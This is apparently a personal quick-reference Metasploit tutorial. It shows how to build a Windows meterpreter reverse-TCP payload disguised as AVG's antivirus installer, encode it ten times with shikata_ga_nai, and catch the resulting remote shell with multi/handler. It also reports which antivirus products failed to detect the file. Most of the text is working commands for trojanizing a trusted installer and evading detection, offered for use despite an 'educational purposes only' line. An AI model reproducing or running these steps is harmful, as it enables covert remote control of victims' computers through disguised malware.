Metasploit Tutorial 1

This tutorial is for educational purposes only.  I know there are a lot of good tutorials out there but I am creating my own as a quick reference. and have some great video tutorials.  This is just a quick reference using meterpreter.


windows/meterpreter/reverse_tcp LHOST= LPORT=8888 R | msfencode -x /home/kod/avg_free_stb_all_9_114_cnet.exe  -t exe -e x86/shikata_ga_nai -c 10 -o evilfile.exe


Here I took AVG's valid installer file and used its characteristics in evilfile.exe. I also encoded it 10 times using shikata_ga_nai. You take evilfile.exe and place it on the target machine.


Kick off Metasploit and type:


# use multi/handler
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LHOST
# set LPORT 8888
# exploit


Run your file on the target machine.


Also, by using AVG's characteristics and encoding 10 times, only Sophos and DrWeb caught that this was really malware. When I encoded the payload of windows/shell/reverse_tcp, Windows Security Essentials and Sophos caught that. What's up with the main virus players? Symantec, McAfee, and Trend all thought the file was good.